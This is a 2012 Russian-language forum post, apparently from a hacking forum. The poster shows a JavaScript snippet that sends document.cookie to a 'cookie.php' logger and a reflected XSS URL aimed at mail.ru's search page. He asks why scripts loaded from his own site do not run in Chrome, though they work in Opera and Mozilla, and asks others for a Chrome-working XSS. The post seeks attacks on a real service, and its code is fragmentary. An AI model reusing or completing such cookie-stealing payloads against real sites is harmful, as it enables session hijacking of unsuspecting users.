
24.02.2012, 11:45
|
|
Новичок
Регистрация: 28.01.2012
Сообщений: 7
Провел на форуме: 1927
Репутация:
0
|
|
Ты наверное имел ввиду ,такой пример:
js:
document.write("/cookie.php?c=" + document.cookie +"\">");
cookie.php:
javascript-ы подгружаемые с моего сайта во время выполнения XSS не срабатывают (независимо какой код в них)
Например в адресной строке Хрома ввожу :
http://www.mail.ru/jsearch/?s=">
file.js -подгружается в Хром (видно по обменам пакетами в СommonView) , но не срабатывает . Может из-за защиты ,
Установленной в последних версиях
В опере и в мозиле эта xss-ка "легко" срабатывает . У кого нибудь есть простой пример xss в Хроме...наблюдается тенденция опережения среди браузеров - Chrome
|
|
|